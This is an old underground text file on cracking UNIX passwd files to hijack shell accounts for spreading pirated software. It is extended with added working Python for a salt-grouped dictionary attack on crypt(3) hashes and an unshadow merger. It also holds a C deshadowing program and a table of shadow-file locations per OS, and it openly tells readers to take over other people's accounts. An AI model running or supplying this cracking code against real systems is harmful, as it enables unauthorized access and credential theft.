+----------------------------------------------------------------------------+
  Author(s):  Krypto
  Subject:    Cracking that "Passwd" File
+----------------------------------------------------------------------------+
                 R E A L I T Y   C H E C K   N E T W O R K !
+----------------------------------------------------------------------------+

    I'm not an amazing "3l33t3" hacker, but I have picked up some things
    over the course of my scene life.

    At times, many of us are without an Internet shell account, which
    limits our ability to spread the warez. Many of us remedy this by
    cracking Internet shell accounts and doing as we please with them,
    mainly spreading. Here I'll show you the basic process of cracking
    UNIX accounts so that you can better your efforts in spreading them
    warez.

    Most Internet shells are UNIX based and therefore keep an entry for
    every user, including the hashed password, in a file called the
    "passwd" file. This is usually located at /etc/passwd, and it is
    world-readable, which is what makes the whole attack possible. The
    basic structure of the passwd file is lines looking like this:

        bgates:VKa0XuF8KB4sc:5604:12:William Gates:/home/bgates:/bin/bash

    Essentially, the line is broken down (by colons) into these parts:

        Username:                             bgates
        Encrypted (hashed) password:          VKa0XuF8KB4sc
        User ID (UID):                        5604
        Group ID (GID):                       12
        GECOS field (usually the real name):  William Gates
        Home directory:                       /home/bgates
        Login shell:                          /bin/bash

    Your main concern is to crack the password of every user. The
    password field is not really encrypted; it is the output of crypt(3),
    a one-way hash, so it cannot be decrypted. Its first two characters
    ("VK" above) are the salt, picked at random when the password was set
    and mixed into the hash so that two users with the same password get
    different hashes. A cracking program takes candidate words, hashes
    each one with the salt of the account it is attacking, and compares
    the result with the stored hash. If they match, you have cracked the
    password.

    Because cracking relies on hashing candidate words, you MUST have a
    wordlist. For beginners, a basic wordlist is the dictionary file
    supplied as part of UNIX (/usr/dict/words on older systems,
    /usr/share/dict/words on newer ones). The more comprehensive the
    wordlist is, the better your chances of successfully cracking
    passwords; good crackers also "mangle" each word (capitalise it,
    append a digit, reverse it), since most people's passwords are a
    dictionary word with a small twist. Next, you'll need a passwd
    cracker, which comes in numerous versions depending on your operating
    system. Currently the best are:

        Software            Operating System
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        CrackerJack v1.4    DOS
        Crack               UNIX

    Run the cracking program, feed your wordlist and passwd file into it,
    and watch as it cracks the passwords.

    Sometimes you'll discover that the passwd file is incomplete or looks
    something like this:

        bgates:*:5604:12:William Gates:/home/bgates:/bin/bash

    The * is called the token and means that the passwd file has been
    shadowed (on System V and Linux the token is usually "x"; note that a
    "*" can also just mean a locked account with no valid password).
    Password shadowing is a security measure where the hash in the
    password field of /etc/passwd is replaced with a special token and the
    real hash is stored in a separate file which is not readable by normal
    system users.
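Here is what such a cracker actually does, as an added example: this is my own Python, not code from the article and not from Crack or CrackerJack. parse_passwd_line() splits a passwd(5) line into the seven fields listed above, is_crackable() skips entries whose password field is only a token, mangle() applies a handful of Crack-style word rules (a generalisation of the "comprehensive wordlist" point), and crack() hashes each candidate once per distinct salt instead of once per user, which is the trick that makes a dictionary attack on a large passwd file affordable. crypt3() wraps the system's traditional DES crypt(3) through Python's crypt module or libcrypt via ctypes and returns None where neither is usable, so the constructed sample file and wordlist below are built with toy_hash(), a stand-in with the same two-character-salt shape that is NOT crypt(3). All function names, the sample entries and the wordlist are mine; the one real DES test vector (U*U*U*U* under salt CC) is the first entry of John the Ripper's DES self-test.

```python
"""Dictionary attack on crypt(3)-style passwd entries (added example)."""
import ctypes
import hashlib
import warnings
from collections import defaultdict

# Password-field values that are not a hash at all (shadow tokens, locked
# markers, or no password set).
SHADOW_TOKENS = {"*", "x", "!", "!!", ""}


def parse_passwd_line(line):
    """Split one passwd(5) line into its seven named fields."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        raise ValueError("malformed passwd line: %r" % line)
    name, pw, uid, gid, gecos, home, shell = fields
    return {"name": name, "hash": pw, "uid": int(uid), "gid": int(gid),
            "gecos": gecos, "home": home, "shell": shell}


def is_crackable(pw_hash):
    """True when the field holds something worth attacking: not a shadow
    token and not a locked marker such as '*LK*' or '!...'."""
    return pw_hash not in SHADOW_TOKENS and not pw_hash.startswith(("*", "!"))


def mangle(word):
    """A few classic Crack-style rules: as-is, Capitalised, UPPER, reversed,
    and the first two forms with a trailing digit."""
    forms = [word, word.capitalize(), word.upper(), word[::-1]]
    for base in forms[:2]:
        forms.extend(base + d for d in "0123456789")
    return forms


def _load_crypt():
    """Find a traditional crypt(3): Python's crypt module (removed in 3.13)
    or libcrypt through ctypes.  None if neither is usable."""
    try:
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", DeprecationWarning)
            import crypt
        return crypt.crypt
    except ImportError:
        pass
    for name in ("libcrypt.so.1", "libcrypt.so", None):
        try:
            fn = ctypes.CDLL(name).crypt
        except (OSError, AttributeError, TypeError):
            continue
        fn.restype = ctypes.c_char_p
        fn.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
        return lambda w, s: (fn(w.encode(), s.encode()) or b"").decode()
    return None


_CRYPT = _load_crypt()


def crypt3(word, salt):
    """Traditional DES crypt(3) of word under a 2-char salt: 13 chars, salt
    first.  None if this system cannot do DES (a libxcrypt built without
    legacy hashes hands back a short '*0' failure token instead)."""
    if _CRYPT is None:
        return None
    out = _CRYPT(word, salt[:2])
    if not out or len(out) != 13 or not out.startswith(salt[:2]):
        return None
    return out


def crypt3_selftest():
    """Check crypt3() against John the Ripper's first DES test vector.
    None when DES crypt is unavailable here."""
    h = crypt3("U*U*U*U*", "CC")
    return None if h is None else h == "CCNf8Sbh3HDfQ"


def toy_hash(word, salt):
    """Stand-in with crypt(3)'s shape (salt + 11 chars).  NOT crypt(3); it
    only lets the attack logic run where DES crypt is missing."""
    return salt + hashlib.sha256((salt + word).encode()).hexdigest()[:11]


def crack(entries, wordlist, hashfn=crypt3, rules=mangle):
    """Dictionary attack.  Returns {username: password} for every entry
    whose hash matched a candidate.  Entries are grouped by salt so each
    candidate is hashed once per distinct salt, not once per user."""
    if hashfn is crypt3 and _CRYPT is None:
        raise RuntimeError("no DES crypt(3) on this system; pass hashfn=")
    by_salt = defaultdict(dict)          # salt -> {hash: [usernames]}
    for e in entries:
        if is_crackable(e["hash"]):
            by_salt[e["hash"][:2]].setdefault(e["hash"], []).append(e["name"])
    found = {}
    for word in wordlist:
        for cand in rules(word):
            for salt, hashes in by_salt.items():
                for user in hashes.get(hashfn(cand, salt), ()):
                    found.setdefault(user, cand)   # first hit wins
    return found


# Constructed sample passwd file (hashes made with toy_hash) and wordlist.
SAMPLE_PASSWD = "\n".join([
    "root:%s:0:0:root:/root:/bin/sh" % toy_hash("toor", "ab"),
    "bgates:%s:5604:12:William Gates:/home/bgates:/bin/bash" % toy_hash("Windows1", "VK"),
    "alice:%s:1001:100:Alice:/home/alice:/bin/csh" % toy_hash("dragon", "VK"),
    "bob:*:1002:100:Bob:/home/bob:/bin/sh",          # locked / shadow token
    "daemon:x:1:1:daemon:/:/usr/sbin/nologin",       # System V shadow token
])
WORDLIST = ["password", "dragon", "windows", "toor", "letmein"]

if __name__ == "__main__":
    entries = [parse_passwd_line(l) for l in SAMPLE_PASSWD.splitlines()]
    print("DES crypt(3) self-test:", crypt3_selftest())
    print(crack(entries, WORDLIST, hashfn=toy_hash))
```

Against a real passwd file you would call crack(entries, words) with the default hashfn so that the system's crypt(3) is used; bgates and alice share the salt VK, so every candidate is hashed once for both of them, which is exactly why Crack sorts its input by salt before it starts.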
    In order to defeat this, you'll need to write a C program and
    compile it, similar to the one below:

        Cut out the program at the bottom and save it as "shadow.c"

        Run "gcc shadow.c -o shadow" or "cc shadow.c -o shadow"

        Run "./shadow >> password"

    "password" should then be your deshadowed password list.

    Be warned that this only works on systems whose C library fills in
    pw_passwd from the shadow database when getpwent(3) is called, and
    they do that only for a privileged (root) caller. On Linux getpwent()
    never reads /etc/shadow at all (that is getspent(3), which needs root),
    so there the program just prints the same tokens you already have. If
    you can run it as root you can equally well just read the shadow file
    from the table below.

    If you have any problems, or need any help whatsoever... DO NOT
    CONTACT ME!

+----------------------------------------------------------------------------+

    Sample Unshadow Program
    ~~~~~~~~~~~~~~~~~~~~~~~

    /* shadow.c: walk the password database with getpwent(3) and print every
     * entry in /etc/passwd format.  pw_passwd is only the real hash where
     * libc fills it in from the shadow database for a privileged caller;
     * otherwise it is the token from /etc/passwd.  See getpwent(3). */

    #include <stdio.h>
    #include <pwd.h>

    #ifdef elxsi
    /* Name of the shadow password file. Contains password and aging info */

    #define SHADOWPW     "/etc/shadowpw"
    #define SHADOWPW_PAG "/etc/shadowpw.pag"
    #define SHADOWPW_DIR "/etc/shadowpw.dir"
    /*
     * Shadow password file pwd->pw_gecos field contains:
     *
     *   <type>,<period>,<last_time>,<old_time>,<old_password>
     *
     * <type>         = Type of password criteria to enforce (type int).
     *                  BSD_CRIT (0), normal BSD.
     *                  STR_CRIT (1), strong passwords.
     * <period>       = Password aging period (type long).
     *                  0, no aging.
     *                  else, number of seconds in aging period.
     * <last_time>    = Time (seconds from epoch) of the last password
     *                  change (type long).
     *                  0, never changed.
     * <old_time>     = Time (seconds from epoch) that the current password
     *                  was made the <old_password> (type long).
     *                  0, never changed.
     * <old_password> = Password (encrypted) saved for an aging <period> to
     *                  prevent reuse during that period (type char [20]).
     *                  "*******", no <old_password>.
     */

    /* number of tries to change an aged password */
    #define CHANGE_TRIES 3

    /* program to execute to change passwords */
    #define PASSWD_PROG "/bin/passwd"

    /* Name of the password aging exempt user names file and max number of
     * entries */
    #define EXEMPTPW   "/etc/exemptpw"
    #define MAX_EXEMPT 100

    /* Password criteria to enforce */
    #define BSD_CRIT 0   /* Normal BSD password criteria */
    #define STR_CRIT 1   /* Strong password criteria */
    #define MAX_CRIT 1
    #endif /* elxsi */

    /* Print one entry in passwd(5) format.  This must take the C library's
     * own struct passwd: the original listing declared its own SHADOWPW
     * struct with extra pw_quota/pw_comment members, so the fields it read
     * did not line up with the real entry. */
    static void printpw(const struct passwd *a)
    {
        printf("%s:%s:%d:%d:%s:%s:%s\n",
               a->pw_name, a->pw_passwd, (int)a->pw_uid, (int)a->pw_gid,
               a->pw_gecos, a->pw_dir, a->pw_shell);
    }

    int main(void)
    {
        struct passwd *p;

        setpwent();                        /* rewind to the first entry */
        while ((p = getpwent()) != NULL)   /* NULL at end of database  */
            printpw(p);
        endpwent();
        return 0;
    }

    /* SunOS 5.0     /etc/shadow                  */
    /* SunOS4.1+c2   /etc/security/passwd.adjunct */

+----------------------------------------------------------------------------+

    The passwd file is located in the following paths for each system.
    To determine your UNIX system type, enter the following at the UNIX
    prompt:

        uname -a

    UNIX Paths (Courtesy of 2600)

        UNIX                   Path                                   Token
        ------------------------------------------------------------------
        AIX 3                  /etc/security/passwd                   !
          or                   /tcb/auth/files/<first letter          #
                                 of username>/<username>
        A/UX 3.0s              /tcb/files/auth/?/*
        BSD4.3-Reno            /etc/master.passwd                     *
        ConvexOS 10            /etc/shadpw                            *
        ConvexOS 11            /etc/shadow                            *
        DG/UX                  /etc/tcb/aa/user/                      *
        EP/IX                  /etc/shadow                            x
        HP-UX                  /.secure/etc/passwd                    *
        IRIX 5                 /etc/shadow                            x
        Linux 1.1              /etc/shadow                            *
        OSF/1                  /etc/passwd[.dir|.pag]                 *
        SCO Unix #.2.x         /tcb/auth/files/<first letter          *
                                 of username>/<username>
        SunOS4.1+c2            /etc/security/passwd.adjunct           ##username
        SunOS 5.0              /etc/shadow
                               <optional NIS+ private secure maps/tables/whatever>
        System V Release 4.0   /etc/shadow                            x
        System V Release 4.2   /etc/security/* database
        Ultrix 4               /etc/auth[.dir|.pag]                   *
        UNICOS                 /etc/udb                               *

    The Token column is what you will see in the password field of
    /etc/passwd when that system is shadowed.

    A properly shadowed system will not give up its hashes to that sample
    program: run without privilege, getpwent() just returns the token, so
    the "deshadowed" list looks exactly like the /etc/passwd you started
    from. (The listing as originally published also declared printpw()
    with its own SHADOWPW struct, whose layout does not match the C
    library's struct passwd, so it read the wrong pointers and tended to
    die with a segmentation fault instead of printing anything; the
    version above uses struct passwd.) Remember, don't come bugging me on
    IRC if your little hacking escapade doesn't turn out like you wanted
    it to. Well, that's all for now, enjoy your newly hacked UNIX accounts
    and spread them warez.

+----------------------------------------------------------------------------+
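To close the shadowing discussion with something that runs, here is an added example in Python; it is my own code, not from the article, 2600 or Crack. Rather than hoping getpwent() leaks the hash, it takes the text of /etc/passwd and of a shadow-style file from the table (both constructed below; on a real box you need root to read the second one) and merges them the way the unshadow utility that ships with crackers does, putting the real hash back into the second field. classify_password_field() interprets that field using the Token column above, so the output tells a DES hash apart from a shadow token, a locked account (such as a Solaris-style *LK*), an empty password and a SunOS 4 C2 ##username adjunct pointer. The hash "aaMeJ5wTGZfUE" is invented; "VKa0XuF8KB4sc" is the one from the article's example line; all function names are mine.

```python
"""Unshadow a passwd file and classify its password fields (added example)."""
import string

# Characters crypt(3) can emit: a traditional DES hash is 13 of these.
CRYPT_ALPHABET = set(string.ascii_letters + string.digits + "./")


def classify_password_field(field):
    """Meaning of the second field of a passwd(5) line, following the Token
    column of the path table: '' no password at all; 'x', '*' or '!' a
    shadow token ('*' may equally be a locked account); '##user' the
    SunOS 4 C2 passwd.adjunct pointer; any other '*'- or '!'-prefixed value
    a locked account (e.g. '*LK*'); 13 crypt characters a DES hash; anything
    else (e.g. '$1$...', '$6$...') a modular-crypt hash that needs a
    different cracker."""
    if field == "":
        return "empty"
    if field in ("x", "*", "!"):
        return "shadow-token"
    if field.startswith("##"):
        return "adjunct:" + field[2:]
    if field.startswith(("*", "!")):
        return "locked"
    if len(field) == 13 and set(field) <= CRYPT_ALPHABET:
        return "des-hash"
    return "other"


def parse_shadow_line(line):
    """Name, hash and the remaining (aging) fields of a shadow-style line.
    Every format in the table that is a plain text file (shadow(5),
    master.passwd, passwd.adjunct) puts the name first and the hash second."""
    name, pw, *rest = line.rstrip("\n").split(":")
    return name, pw, rest


def unshadow(passwd_text, shadow_text):
    """Merge like Crack's/John's unshadow: return the passwd lines with the
    real hash in the password field, plus {user: reason} for every entry
    that is still not crackable afterwards."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            name, pw, _ = parse_shadow_line(line)
            hashes[name] = pw
    merged, notes = [], {}
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("malformed passwd line: %r" % line)
        name = fields[0]
        if classify_password_field(fields[1]) == "shadow-token" and name in hashes:
            fields[1] = hashes[name]        # put the real hash back
        kind = classify_password_field(fields[1])
        if kind != "des-hash":
            notes[name] = kind
        merged.append(":".join(fields))
    return merged, notes


# Constructed sample files.  "aaMeJ5wTGZfUE" is invented; "VKa0XuF8KB4sc" is
# the hash from the article's example line.  Shadow lines use the shadow(5)
# layout: name:hash:lastchg:min:max:warn:inactive:expire:flag.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
bgates:x:5604:12:William Gates:/home/bgates:/bin/bash
guest::1003:100:Guest:/home/guest:/bin/sh
bob:x:1002:100:Bob:/home/bob:/bin/sh
nobody:*:65534:65534:nobody:/:/usr/sbin/nologin
"""
SAMPLE_SHADOW = """\
root:aaMeJ5wTGZfUE:10000:0:99999:7:::
bgates:VKa0XuF8KB4sc:10000:0:99999:7:::
bob:*LK*:10000:0:99999:7:::
"""

if __name__ == "__main__":
    lines, left = unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)
    print("\n".join(lines))
    print("not crackable:", left)
```

The merged lines are in plain passwd format, so they can go straight into Crack or the dictionary attack shown earlier; the notes dict is the part worth reading first on a real system, because an account whose field is still a token after the merge means the shadow file you were given was incomplete, not that the cracker is broken.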